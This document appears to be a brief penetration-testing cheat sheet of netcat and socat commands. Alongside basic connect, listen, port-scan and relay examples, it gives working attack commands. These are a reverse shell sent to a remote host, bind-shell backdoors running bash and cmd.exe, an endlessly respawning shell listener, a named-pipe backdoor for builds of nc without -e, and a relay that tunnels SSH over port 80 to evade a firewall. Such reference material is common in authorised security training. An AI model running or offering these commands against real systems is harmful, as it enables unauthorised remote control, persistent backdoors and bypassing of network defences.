Netcat & Socat

Netcat rocks my socks

Netcat

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81

nc 192.168.1.1 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to host 10.0.0.2 over TCP port 53

nc 10.0.0.2 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10 to 90 on 10.0.0.1: -n skips name resolution, -z sends no data (scan only), and -w1 waits at most 1 second per connection

nc -nvzw1 10.0.0.1 10-90

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in an infinite bash loop is an easy workaround; run it under nohup as well so it survives the terminal closing.

while [ 1 ]; do echo "started"; nc -l -p 1234 -e /bin/sh; done

Netcat relay: everything received by the host on TCP 4321 is forwarded to 10.0.0.1 on TCP 8123. Note this is one-directional; replies from 10.0.0.1 go to the second nc's stdout, not back to the client

nc -l -p 4321 | nc 10.0.0.1 8123

Create a netcat backdoor on a build of nc without -e support. A named pipe (FIFO) funnels data between bash and nc: nc's output (what the client sends) is written into the pipe and read as bash's stdin, while bash's output is piped into nc and sent back to the client.

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe

Firewall Evasion

If a specific port is blocked at the firewall, netcat can relay traffic over a port that is allowed. Using a named pipe, a listener on the allowed port (80 here) relays data in both directions to the local SSH service on 22

mknod mypipe p
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
ssh backdoor@m4lwhere.org -p 80    # Attacker command to connect to ssh relayed through port 80

Socat

socat is a more capable alternative to netcat: it supports SSL/TLS and forking a separate handler per connection

# Below command listens locally on 8080, forwards connections to 10.0.0.1:80
socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80

# Listen with SSL on 8443 (verify=0 disables client certificate verification) and send to stdout
socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio

Last updated 3 years ago
